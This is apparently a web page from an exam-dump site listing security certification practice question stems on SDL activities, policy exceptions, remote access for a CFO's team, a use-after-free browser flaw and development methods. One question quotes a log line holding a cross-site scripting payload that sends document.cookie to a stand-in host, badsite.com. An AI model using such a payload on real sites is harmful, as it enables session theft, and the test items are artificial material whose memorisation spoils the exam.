PrepAway - Latest Free Exam Questions & Answers

Author: seenagape

Which of the following security activities should be im…

A company is in the process of implementing a new front-end user interface for its customers; the goal is to
provide them with more self-service functionality. The application has been written by developers over the last
six months and the project is currently in the test phase. Which of the following security activities should be
implemented as part of the SDL in order to provide the MOST security coverage over the solution? (Select TWO).

Which of the following are MOST important to include wh…

The Information Security Officer (ISO) is reviewing new policies that have been recently made effective and
now apply to the company. Upon review, the ISO identifies a new requirement to implement two-factor
authentication on the company’s wireless system. Due to budget constraints, the company will be unable to
implement the requirement for the next two years. The ISO is required to submit a policy exception form to the
Chief Information Officer (CIO). Which of the following are MOST important to include when submitting the
exception form? (Select THREE).

A security administrator notices the following line in …

A security administrator notices the following line in a server’s security log:
<input name='credentials' type='TEXT' value='" +
request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>') + "';
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on
the server. Which of the following should the security administrator implement to prevent this particular attack?

What should we do first to securely enable this capabil…

A security manager has received the following email from the Chief Financial Officer (CFO):
“While I am concerned about the security of the proprietary financial data in our ERP application, we have had
a lot of turnover in the accounting group and I am having a difficult time meeting our monthly performance
targets. As things currently stand, we do not allow employees to work from home but this is something I am
willing to allow so we can get back on track. What should we do first to securely enable this capability for my group?” Based on the information
provided, which of the following would be the MOST appropriate response to the CFO?

Which of the following BEST describes the application issue?

Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the
browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The
browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the
following BEST describes the application issue?

Which of the following methods of software development …

A mature organization with legacy information systems has incorporated numerous new processes and
dependencies to manage security as its networks and infrastructure are modernized. The Chief Information
Officer has become increasingly frustrated with frequent releases, stating that the organization needs everything
to work completely, and the vendor should already have those desires built into the software product. The
vendor has been in constant communication with personnel and groups within the organization to understand
its business process and capture new software requirements from users. Which of the following
methods of software development is this organization’s configuration management process using?

